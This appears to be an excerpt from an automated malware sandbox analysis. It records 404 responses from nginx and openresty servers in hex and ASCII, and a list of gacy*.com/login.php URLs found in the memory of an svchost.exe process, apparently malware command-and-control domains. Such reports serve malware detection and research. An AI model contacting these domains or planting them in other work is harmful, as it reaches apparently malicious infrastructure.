Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:53:29 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 08:53:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sun, 08 Sep 2024 08:53:52 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:53:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:53:54 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Sun, 08 Sep 2024 08:54:11 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Sun, 08 Sep 2024 08:54:12 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:54:13 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 08 Sep 2024 08:54:14 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacycaz.com/login.php
Source: svchost.exe, 00000002.00000003.2088422532.0000000006677000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacydes.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacydib.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145251441.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2281905134.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2144468325.000000000B5A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyfeb.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006806064.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1996165263.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyfew.com/login.php
Source: svchost.exe, 00000002.00000003.2059929995.00000000066BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085027687.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyhez.com/login.php
Source: svchost.exe, 00000002.00000003.1897979252.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyhis.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacykub.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynow.com/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynuz.com/login.php
Source: svchost.exe, 00000002.00000002.2615644364.000000000B400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619875207.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynyh.com/login.php
